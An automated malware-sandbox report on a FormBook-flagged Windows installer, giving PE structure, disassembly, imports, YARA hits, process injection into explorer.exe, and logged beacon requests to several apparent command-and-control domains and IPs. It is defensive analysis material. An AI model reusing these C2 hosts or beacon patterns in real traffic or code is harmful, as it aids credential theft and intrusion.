                                    • Antivirus: ReversingLabs, Detection: 50%
                                    Joe Sandbox View:
                                    • Filename: product list.xlsx, Detection: malicious
                                    Reputation:low
                                    Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......;6.A.W...W...W..r.s.^W..r.M.oW..r.r..W....\.|W....Y.lW...W...W......~W......~W....m.~W......~W..Rich.W..................PE..L....R.a...........!.........................................................p......T...................................L............`..............................0...............................P...@...............<............................text...L........................... ..`.rdata...R.......T..................@..@.data....U.......:..................@....rsrc........`......................@..B........................................................................................................................................................................................................................................................................................................................................................

                                    Static File Info

                                    General

                                    File type:PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
                                    Entropy (8bit):7.939366323187133
                                    TrID:
                                    • Win32 Executable (generic) a (10002005/4) 92.16%
                                    • NSIS - Nullsoft Scriptable Install System (846627/2) 7.80%
                                    • Generic Win/DOS Executable (2004/3) 0.02%
                                    • DOS Executable Generic (2002/1) 0.02%
                                    • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                    File name:Y1p8VPvyU2.exe
                                    File size:318467
                                    MD5:83be105c9fa2427bd6079f5d19659596
                                    SHA1:1430baa740d2cd40a507cbfa8fe62e3d78424315
                                    SHA256:8cd6125941710166af38133bce6cae9f9cc41c8d88ff774cd691081d193015a1
                                    SHA512:09a2c3c9d9b147e6c25d824c931b2c0f4f9daaccdbde4a28ad0955be63642e11cb23df8f1d85e719b2b0b535e55b0d2cfb7168312c0f082d8b4f9d1072efdd3e
                                    SSDEEP:6144:rGiw8TRbniXVRaPCuyCxGfYy33TGBbXU2gx7hQn+l6aFu00D/4e3aKize/q:bTwXVRACauYgFo+q0K4VKizR
                                    File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........uJ...$...$...$./.{...$...%.:.$.".y...$..7....$.f."...$.Rich..$.................PE..L......H.................\...........0.....

                                    File Icon

                                    Icon Hash:b2a88c96b2ca6a72

                                    Static PE Info

                                    General

                                    Entrypoint:0x4030e3
                                    Entrypoint Section:.text
                                    Digitally signed:false
                                    Imagebase:0x400000
                                    Subsystem:windows gui
                                    Image File Characteristics:LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
                                    DLL Characteristics:
                                    Time Stamp:0x48EFCDCD [Fri Oct 10 21:49:01 2008 UTC]
                                    TLS Callbacks:
                                    CLR (.Net) Version:
                                    OS Version Major:4
                                    OS Version Minor:0
                                    File Version Major:4
                                    File Version Minor:0
                                    Subsystem Version Major:4
                                    Subsystem Version Minor:0
                                    Import Hash:7fa974366048f9c551ef45714595665e

                                    Entrypoint Preview

                                    Instruction
                                    sub esp, 00000180h
                                    push ebx
                                    push ebp
                                    push esi
                                    xor ebx, ebx
                                    push edi
                                    mov dword ptr [esp+18h], ebx
                                    mov dword ptr [esp+10h], 00409158h
                                    xor esi, esi
                                    mov byte ptr [esp+14h], 00000020h
                                    call dword ptr [00407030h]
                                    push 00008001h
                                    call dword ptr [004070B0h]
                                    push ebx
                                    call dword ptr [0040727Ch]
                                    push 00000008h
                                    mov dword ptr [0042EC18h], eax
                                    call 00007F6505057D48h
                                    mov dword ptr [0042EB64h], eax
                                    push ebx
                                    lea eax, dword ptr [esp+34h]
                                    push 00000160h
                                    push eax
                                    push ebx
                                    push 00428F90h
                                    call dword ptr [00407158h]
                                    push 0040914Ch
                                    push 0042E360h
                                    call 00007F65050579FFh
                                    call dword ptr [004070ACh]
                                    mov edi, 00434000h
                                    push eax
                                    push edi
                                    call 00007F65050579EDh
                                    push ebx
                                    call dword ptr [0040710Ch]
                                    cmp byte ptr [00434000h], 00000022h
                                    mov dword ptr [0042EB60h], eax
                                    mov eax, edi
                                    jne 00007F650505522Ch
                                    mov byte ptr [esp+14h], 00000022h
                                    mov eax, 00434001h
                                    push dword ptr [esp+14h]
                                    push eax
                                    call 00007F65050574E0h
                                    push eax
                                    call dword ptr [0040721Ch]
                                    mov dword ptr [esp+1Ch], eax
                                    jmp 00007F6505055285h
                                    cmp cl, 00000020h
                                    jne 00007F6505055228h
                                    inc eax
                                    cmp byte ptr [eax], 00000020h
                                    je 00007F650505521Ch
                                    cmp byte ptr [eax], 00000022h
                                    mov byte ptr [eax+eax+00h], 00000000h

                                    Rich Headers

                                    Programming Language:
                                    • [EXP] VC++ 6.0 SP5 build 8804

                                    Data Directories

                                    Name | Virtual Address | Virtual Size | Is in Section
                                    IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
                                    IMAGE_DIRECTORY_ENTRY_IMPORT | 0x74b0 | 0xb4 | .rdata
                                    IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x37000 | 0x900 | .rsrc
                                    IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
                                    IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
                                    IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x0 | 0x0 |
                                    IMAGE_DIRECTORY_ENTRY_DEBUG | 0x0 | 0x0 |
                                    IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
                                    IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
                                    IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 |
                                    IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 |
                                    IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
                                    IMAGE_DIRECTORY_ENTRY_IAT | 0x7000 | 0x28c | .rdata
                                    IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
                                    IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 |
                                    IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |

                                    Sections

                                    Name | Virtual Address | Virtual Size | Raw Size | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
                                    .text | 0x1000 | 0x5b68 | 0x5c00 | False | 0.67722486413 | data | 6.48746502716 | IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                                    .rdata | 0x7000 | 0x129c | 0x1400 | False | 0.4337890625 | data | 5.04904254867 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                    .data | 0x9000 | 0x25c58 | 0x400 | False | 0.58203125 | data | 4.76995537906 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
                                    .ndata | 0x2f000 | 0x8000 | 0x0 | False | 0 | empty | 0.0 | IMAGE_SCN_MEM_WRITE, IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                    .rsrc | 0x37000 | 0x900 | 0xa00 | False | 0.4078125 | data | 3.93441125971 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

                                    Resources

                                    Name | RVA | Size | Type | Language | Country
                                    RT_ICON | 0x37190 | 0x2e8 | data | English | United States
                                    RT_DIALOG | 0x37478 | 0x100 | data | English | United States
                                    RT_DIALOG | 0x37578 | 0x11c | data | English | United States
                                    RT_DIALOG | 0x37698 | 0x60 | data | English | United States
                                    RT_GROUP_ICON | 0x376f8 | 0x14 | data | English | United States
                                    RT_MANIFEST | 0x37710 | 0x1eb | XML 1.0 document, ASCII text, with very long lines, with no line terminators | English | United States

                                    Imports

                                    DLL | Import
                                    KERNEL32.dll | CompareFileTime, SearchPathA, GetShortPathNameA, GetFullPathNameA, MoveFileA, SetCurrentDirectoryA, GetFileAttributesA, GetLastError, CreateDirectoryA, SetFileAttributesA, Sleep, GetTickCount, GetFileSize, GetModuleFileNameA, GetCurrentProcess, CopyFileA, ExitProcess, GetWindowsDirectoryA, SetFileTime, GetCommandLineA, SetErrorMode, LoadLibraryA, lstrcpynA, GetDiskFreeSpaceA, GlobalUnlock, GlobalLock, CreateThread, CreateProcessA, RemoveDirectoryA, CreateFileA, GetTempFileNameA, lstrlenA, lstrcatA, GetSystemDirectoryA, GetVersion, CloseHandle, lstrcmpiA, lstrcmpA, ExpandEnvironmentStringsA, GlobalFree, GlobalAlloc, WaitForSingleObject, GetExitCodeProcess, GetModuleHandleA, LoadLibraryExA, GetProcAddress, FreeLibrary, MultiByteToWideChar, WritePrivateProfileStringA, GetPrivateProfileStringA, WriteFile, ReadFile, MulDiv, SetFilePointer, FindClose, FindNextFileA, FindFirstFileA, DeleteFileA, GetTempPathA
                                    USER32.dll | EndDialog, ScreenToClient, GetWindowRect, EnableMenuItem, GetSystemMenu, SetClassLongA, IsWindowEnabled, SetWindowPos, GetSysColor, GetWindowLongA, SetCursor, LoadCursorA, CheckDlgButton, GetMessagePos, LoadBitmapA, CallWindowProcA, IsWindowVisible, CloseClipboard, SetClipboardData, EmptyClipboard, RegisterClassA, TrackPopupMenu, AppendMenuA, CreatePopupMenu, GetSystemMetrics, SetDlgItemTextA, GetDlgItemTextA, MessageBoxIndirectA, CharPrevA, DispatchMessageA, PeekMessageA, DestroyWindow, CreateDialogParamA, SetTimer, SetWindowTextA, PostQuitMessage, SetForegroundWindow, wsprintfA, SendMessageTimeoutA, FindWindowExA, SystemParametersInfoA, CreateWindowExA, GetClassInfoA, DialogBoxParamA, CharNextA, OpenClipboard, ExitWindowsEx, IsWindow, GetDlgItem, SetWindowLongA, LoadImageA, GetDC, EnableWindow, InvalidateRect, SendMessageA, DefWindowProcA, BeginPaint, GetClientRect, FillRect, DrawTextA, EndPaint, ShowWindow
                                    GDI32.dll | SetBkColor, GetDeviceCaps, DeleteObject, CreateBrushIndirect, CreateFontIndirectA, SetBkMode, SetTextColor, SelectObject
                                    SHELL32.dll | SHGetPathFromIDListA, SHBrowseForFolderA, SHGetFileInfoA, ShellExecuteA, SHFileOperationA, SHGetSpecialFolderLocation
                                    ADVAPI32.dll | RegQueryValueExA, RegSetValueExA, RegEnumKeyA, RegEnumValueA, RegOpenKeyExA, RegDeleteKeyA, RegDeleteValueA, RegCloseKey, RegCreateKeyExA
                                    COMCTL32.dll | ImageList_AddMasked, ImageList_Destroy, ImageList_Create
                                    ole32.dll | CoTaskMemFree, OleInitialize, OleUninitialize, CoCreateInstance
                                    VERSION.dll | GetFileVersionInfoSizeA, GetFileVersionInfoA, VerQueryValueA

                                    Possible Origin

                                    Language of compilation system | Country where language is spoken
                                    English | United States

                                    Network Behavior

                                    Snort IDS Alerts

                                    Timestamp | Protocol | SID | Message | Source Port | Dest Port | Source IP | Dest IP
                                    12/02/21-20:00:36.476668 | TCP | 1201 | ATTACK-RESPONSES 403 Forbidden | 80 | 49777 | 34.102.136.180 | 192.168.2.3
                                    12/02/21-20:00:41.788599 | TCP | 1201 | ATTACK-RESPONSES 403 Forbidden | 80 | 49793 | 34.102.136.180 | 192.168.2.3

                                    Network Port Distribution

                                    TCP Packets


                                    UDP Packets


                                    DNS Queries

                                    Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class
                                    Dec 2, 2021 20:00:36.186220884 CET | 192.168.2.3 | 8.8.8.8 | 0x10ba | Standard query (0) | www.yr-golf.com | A (IP address) | IN (0x0001)
                                    Dec 2, 2021 20:00:41.495348930 CET | 192.168.2.3 | 8.8.8.8 | 0xc7e4 | Standard query (0) | www.assisttm.com | A (IP address) | IN (0x0001)
                                    Dec 2, 2021 20:00:46.807691097 CET | 192.168.2.3 | 8.8.8.8 | 0x498e | Standard query (0) | www.gsjbd1.club | A (IP address) | IN (0x0001)
                                    Dec 2, 2021 20:00:51.858485937 CET | 192.168.2.3 | 8.8.8.8 | 0x9dd7 | Standard query (0) | www.tyjgfuke.com | A (IP address) | IN (0x0001)
                                    Dec 2, 2021 20:01:16.770849943 CET | 192.168.2.3 | 8.8.8.8 | 0x9969 | Standard query (0) | www.tyjgfuke.com | A (IP address) | IN (0x0001)
                                    Dec 2, 2021 20:01:18.165642023 CET | 192.168.2.3 | 8.8.8.8 | 0x7c7d | Standard query (0) | www.fastbest.host | A (IP address) | IN (0x0001)
                                    Dec 2, 2021 20:01:23.519859076 CET | 192.168.2.3 | 8.8.8.8 | 0xe521 | Standard query (0) | www.caixadepandora.club | A (IP address) | IN (0x0001)

                                    DNS Answers

                                    Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class
                                    Dec 2, 2021 20:00:36.210366011 CET | 8.8.8.8 | 192.168.2.3 | 0x10ba | No error (0) | www.yr-golf.com | yr-golf.com |  | CNAME (Canonical name) | IN (0x0001)
                                    Dec 2, 2021 20:00:36.210366011 CET | 8.8.8.8 | 192.168.2.3 | 0x10ba | No error (0) | yr-golf.com |  | 34.102.136.180 | A (IP address) | IN (0x0001)
                                    Dec 2, 2021 20:00:41.519289017 CET | 8.8.8.8 | 192.168.2.3 | 0xc7e4 | No error (0) | www.assisttm.com | assisttm.com |  | CNAME (Canonical name) | IN (0x0001)
                                    Dec 2, 2021 20:00:41.519289017 CET | 8.8.8.8 | 192.168.2.3 | 0xc7e4 | No error (0) | assisttm.com |  | 34.102.136.180 | A (IP address) | IN (0x0001)
                                    Dec 2, 2021 20:00:46.831301928 CET | 8.8.8.8 | 192.168.2.3 | 0x498e | Name error (3) | www.gsjbd1.club | none | none | A (IP address) | IN (0x0001)
                                    Dec 2, 2021 20:00:52.032300949 CET | 8.8.8.8 | 192.168.2.3 | 0x9dd7 | No error (0) | www.tyjgfuke.com |  | 23.110.214.34 | A (IP address) | IN (0x0001)
                                    Dec 2, 2021 20:01:16.942539930 CET | 8.8.8.8 | 192.168.2.3 | 0x9969 | No error (0) | www.tyjgfuke.com |  | 23.110.214.34 | A (IP address) | IN (0x0001)
                                    Dec 2, 2021 20:01:18.359935045 CET | 8.8.8.8 | 192.168.2.3 | 0x7c7d | No error (0) | www.fastbest.host |  | 45.8.125.8 | A (IP address) | IN (0x0001)
                                    Dec 2, 2021 20:01:23.555322886 CET | 8.8.8.8 | 192.168.2.3 | 0xe521 | No error (0) | www.caixadepandora.club |  | 137.184.111.224 | A (IP address) | IN (0x0001)

                                    HTTP Request Dependency Graph

                                    • www.yr-golf.com
                                    • www.assisttm.com
                                    • www.fastbest.host

                                    HTTP Packets

                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                    0 | 192.168.2.3 | 49777 | 34.102.136.180 | 80 | C:\Windows\explorer.exe
                                    Timestamp | kBytes transferred | Direction | Data
                                    Dec 2, 2021 20:00:36.234204054 CET | 8401 | OUT | GET /n6fr/?W0Gd5=_zrxFrQh&r8Yhe8X=BQDMjsZC/MHMhOokLNCZ8NvLdfoNcIlcbjuvjCJyzVYcZRVM3RE3M6YlVSnQ+pY87GBB HTTP/1.1
                                    Host: www.yr-golf.com
                                    Connection: close
                                    Data Raw: 00 00 00 00 00 00 00
                                    Data Ascii:
                                    Dec 2, 2021 20:00:36.476667881 CET | 8403 | IN | HTTP/1.1 403 Forbidden
                                    Server: openresty
                                    Date: Thu, 02 Dec 2021 19:00:36 GMT
                                    Content-Type: text/html
                                    Content-Length: 275
                                    ETag: "61973ffe-113"
                                    Via: 1.1 google
                                    Connection: close
                                    Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta http-equiv="content-type" content="text/html;charset=utf-8"> <link rel="shortcut icon" href="data:image/x-icon;," type="image/x-icon"> <title>Forbidden</title></head><body><h1>Access Forbidden</h1></body></html>


                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                    1 | 192.168.2.3 | 49793 | 34.102.136.180 | 80 | C:\Windows\explorer.exe
                                    Timestamp | kBytes transferred | Direction | Data
                                    Dec 2, 2021 20:00:41.543401957 CET | 8436 | OUT | GET /n6fr/?r8Yhe8X=GhRWdiRsNNJH8eQL+yxTqcpdK2zUc5yAzRv8ilcs8c/60sXMgS13/r7ilAGjTWuYzon7&W0Gd5=_zrxFrQh HTTP/1.1
                                    Host: www.assisttm.com
                                    Connection: close
                                    Data Raw: 00 00 00 00 00 00 00
                                    Data Ascii:
                                    Dec 2, 2021 20:00:41.788599014 CET | 8437 | IN | HTTP/1.1 403 Forbidden
                                    Server: openresty
                                    Date: Thu, 02 Dec 2021 19:00:41 GMT
                                    Content-Type: text/html
                                    Content-Length: 275
                                    ETag: "61a4f026-113"
                                    Via: 1.1 google
                                    Connection: close
                                    Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta http-equiv="content-type" content="text/html;charset=utf-8"> <link rel="shortcut icon" href="data:image/x-icon;," type="image/x-icon"> <title>Forbidden</title></head><body><h1>Access Forbidden</h1></body></html>


                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                    2 | 192.168.2.3 | 49810 | 45.8.125.8 | 80 | C:\Windows\explorer.exe
                                    Timestamp | kBytes transferred | Direction | Data
                                    Dec 2, 2021 20:01:18.436930895 CET | 8482 | OUT | GET /n6fr/?W0Gd5=_zrxFrQh&r8Yhe8X=RitrxMT4CF2430UT8yTHljH4YcWCFGycH+KnQUedz6G1CLl+fZ1eccWunXIbAos2Mzom HTTP/1.1
                                    Host: www.fastbest.host
                                    Connection: close
                                    Data Raw: 00 00 00 00 00 00 00
                                    Data Ascii:
                                    Dec 2, 2021 20:01:18.510102034 CET | 8483 | IN | HTTP/1.1 404 Not Found
                                    Server: nginx/1.20.1
                                    Date: Thu, 02 Dec 2021 19:01:18 GMT
                                    Content-Type: text/html; charset=UTF-8
                                    Content-Length: 7081
                                    Connection: close
                                    Last-Modified: Mon, 27 Sep 2021 00:52:07 GMT
                                    ETag: "1ba9-5ccef81a2c93b"
                                    Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta charset="UTF-8"> <meta name="viewport" content="width=device-width, initial-scale=1.0"> <meta name="description" content> <title>fastbest - </title> <link rel="icon" type="image/png" href="sqUImDCVKAs7.ico"> <link href="https://fonts.googleapis.com/css2?family=Open+Sans:wght@300;400;600;700;800&amp;display=swap" rel="stylesheet"> <link rel="preconnect" href="https://fonts.gstatic.com"> <link href="https://fonts.googleapis.com/css2?family=Josefin+Sans:wght@400;500;600;700&amp;display=swap" rel="stylesheet"> <link rel="stylesheet" href="css/QDT8YfN0BFcM.css"> <link rel="stylesheet" href="css/hKfqNjwXPSze.css"> <link rel="stylesheet" href="css/atTcsRJOLoMl.css"> <link rel="stylesheet" href="css/ohOqlw8pl9nh.css"> <link rel="stylesheet" href="css/LCP6ruLpMHZX.css"> <link rel="stylesheet" href="css/J5hlyq7v4LqI.css"> <link rel="stylesheet" href="css/euvzd0RO7Mnu.css"> <link rel="stylesheet" href="css/rVKeIh4RGg40.css"> <link rel="stylesh
                                    Dec 2, 2021 20:01:18.510129929 CET8484INData Raw: 65 65 74 22 20 68 72 65 66 3d 22 63 73 73 2f 53 34 39 4d 7a 63 4e 69 4a 59 79 52 2e 63 73 73 22 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 63 73 73 2f 33 4e 30 42 67 32 34 75 51 30 46
                                    Data Ascii: eet" href="css/S49MzcNiJYyR.css"> <link rel="stylesheet" href="css/3N0Bg24uQ0Fg.css"> <link rel="stylesheet" href="css/jm4ECKSZcvmb.css"> <link rel="stylesheet" href="css/IdJlOhx5FaDM.css"></head><body> ...[if IE]> <p c
                                    Dec 2, 2021 20:01:18.510266066 CET8486INData Raw: 70 61 63 65 72 2d 32 30 20 2d 2d 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 70 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 66 61 73 74
                                    Data Ascii: pacer-20 --> <p> <a href="https://fastbest.host" class="rt-btn rt-gradient text-capitalize rt-rounded custom-font"></a> </p> </div>... /.col-12 -->
                                    Dec 2, 2021 20:01:18.510354042 CET8487INData Raw: 6c 61 73 73 3d 22 72 74 2d 6d 62 2d 33 30 22 3e 3c 73 74 72 6f 6e 67 3e 53 68 6f 70 70 69 6e 67 20 43 61 72 74 3c 2f 73 74 72 6f 6e 67 3e 3c 2f 68 34 3e 0a 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 61 72 74 62 6f 78 2d 63 6c
                                    Data Ascii: lass="rt-mb-30"><strong>Shopping Cart</strong></h4> <div class="cartbox-close"> <i class="flaticon-cancel"></i> </div>... ./ sidenavclose --> <div class="cart-products rt-mt-30"> <div class="rt-
                                    Dec 2, 2021 20:01:18.510484934 CET8488INData Raw: 3c 2f 64 69 76 3e 3c 21 2d 2d 20 2f 2e 70 72 6f 64 75 63 74 2d 74 65 78 74 20 2d 2d 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 70 72 6f 64 75 63 74 2d 63 6f 6c 6f 73 65 22 3e 0a 20 20 20 20 20 20 20
                                    Data Ascii: </div>... /.product-text --> <div class="product-colose"> <span class="rt-remove-product"><i class="flaticon-cancel"></i></span> </div>... /.product-colose --> </div>... /.rt-s
                                    Dec 2, 2021 20:01:18.510514975 CET8489INData Raw: 2f 64 69 76 3e 3c 21 2d 2d 20 2f 2e 66 6c 6f 61 74 2d 72 69 67 68 74 20 2d 2d 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 64 69 76 3e 3c 21 2d 2d 20 2f 2e 63 6c 65 61 72 66 69 78 20 2d 2d 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 64 69 76
                                    Data Ascii: /div>... /.float-right --> </div>... /.clearfix --> <div class="rt-mt-15"> <a href="#" class="rt-btn rt-gradient multipule-color-strep rt-sm text-uppercase d-block text-center rt-mb-10">View Cart</a>


                                    Code Manipulations

                                    Statistics

                                    CPU Usage

                                    Memory Usage

                                    High Level Behavior Distribution

                                    Behavior

                                    System Behavior

                                    General

                                    Start time:19:59:12
                                    Start date:02/12/2021
                                    Path:C:\Users\user\Desktop\Y1p8VPvyU2.exe
                                    Wow64 process (32bit):true
                                    Commandline:"C:\Users\user\Desktop\Y1p8VPvyU2.exe"
                                    Imagebase:0x400000
                                    File size:318467 bytes
                                    MD5 hash:83BE105C9FA2427BD6079F5D19659596
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Yara matches:
                                    • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000000.00000002.305776988.0000000002420000.00000004.00000001.sdmp, Author: Joe Security
                                    • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000000.00000002.305776988.0000000002420000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                    • Rule: Formbook, Description: detect Formbook in memory, Source: 00000000.00000002.305776988.0000000002420000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                    Reputation:low

                                    General

                                    Start time:19:59:14
                                    Start date:02/12/2021
                                    Path:C:\Users\user\Desktop\Y1p8VPvyU2.exe
                                    Wow64 process (32bit):true
                                    Commandline:"C:\Users\user\Desktop\Y1p8VPvyU2.exe"
                                    Imagebase:0x400000
                                    File size:318467 bytes
                                    MD5 hash:83BE105C9FA2427BD6079F5D19659596
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Yara matches:
                                    • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000001.00000001.304934739.0000000000400000.00000040.00020000.sdmp, Author: Joe Security
                                    • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000001.00000001.304934739.0000000000400000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                    • Rule: Formbook, Description: detect Formbook in memory, Source: 00000001.00000001.304934739.0000000000400000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                                    • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000001.00000000.304424908.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
                                    • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000001.00000000.304424908.0000000000400000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                    • Rule: Formbook, Description: detect Formbook in memory, Source: 00000001.00000000.304424908.0000000000400000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                    • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000001.00000000.303509344.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
                                    • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000001.00000000.303509344.0000000000400000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                    • Rule: Formbook, Description: detect Formbook in memory, Source: 00000001.00000000.303509344.0000000000400000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                    • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000001.00000002.361567881.0000000000670000.00000040.00020000.sdmp, Author: Joe Security
                                    • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000001.00000002.361567881.0000000000670000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                    • Rule: Formbook, Description: detect Formbook in memory, Source: 00000001.00000002.361567881.0000000000670000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                                    • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000001.00000002.361497642.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
                                    • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000001.00000002.361497642.0000000000400000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                    • Rule: Formbook, Description: detect Formbook in memory, Source: 00000001.00000002.361497642.0000000000400000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                    • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000001.00000002.361714769.00000000009E0000.00000040.00020000.sdmp, Author: Joe Security
                                    • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000001.00000002.361714769.00000000009E0000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                    • Rule: Formbook, Description: detect Formbook in memory, Source: 00000001.00000002.361714769.00000000009E0000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                                    Reputation:low

                                    General

                                    Start time:19:59:18
                                    Start date:02/12/2021
                                    Path:C:\Windows\explorer.exe
                                    Wow64 process (32bit):false
                                    Commandline:C:\Windows\Explorer.EXE
                                    Imagebase:0x7ff720ea0000
                                    File size:3933184 bytes
                                    MD5 hash:AD5296B280E8F522A8A897C96BAB0E1D
                                    Has elevated privileges:false
                                    Has administrator privileges:false
                                    Programmed in:C, C++ or other language
                                    Yara matches:
                                    • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000003.00000000.336290310.0000000010086000.00000040.00020000.sdmp, Author: Joe Security
                                    • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000003.00000000.336290310.0000000010086000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                    • Rule: Formbook, Description: detect Formbook in memory, Source: 00000003.00000000.336290310.0000000010086000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                                    Reputation:high

                                    General

                                    Start time:19:59:40
                                    Start date:02/12/2021
                                    Path:C:\Windows\SysWOW64\cscript.exe
                                    Wow64 process (32bit):true
                                    Commandline:C:\Windows\SysWOW64\cscript.exe
                                    Imagebase:0x1300000
                                    File size:143360 bytes
                                    MD5 hash:00D3041E47F99E48DD5FFFEDF60F6304
                                    Has elevated privileges:false
                                    Has administrator privileges:false
                                    Programmed in:C, C++ or other language
                                    Yara matches:
                                    • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000006.00000002.565875481.0000000001220000.00000040.00020000.sdmp, Author: Joe Security
                                    • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000006.00000002.565875481.0000000001220000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                    • Rule: Formbook, Description: detect Formbook in memory, Source: 00000006.00000002.565875481.0000000001220000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                                    • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000006.00000002.567386686.00000000038B0000.00000004.00000001.sdmp, Author: Joe Security
                                    • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000006.00000002.567386686.00000000038B0000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                    • Rule: Formbook, Description: detect Formbook in memory, Source: 00000006.00000002.567386686.00000000038B0000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                    • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000006.00000002.566653867.0000000003440000.00000040.00020000.sdmp, Author: Joe Security
                                    • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000006.00000002.566653867.0000000003440000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                    • Rule: Formbook, Description: detect Formbook in memory, Source: 00000006.00000002.566653867.0000000003440000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                                    Reputation:moderate

                                    General

                                    Start time:19:59:44
                                    Start date:02/12/2021
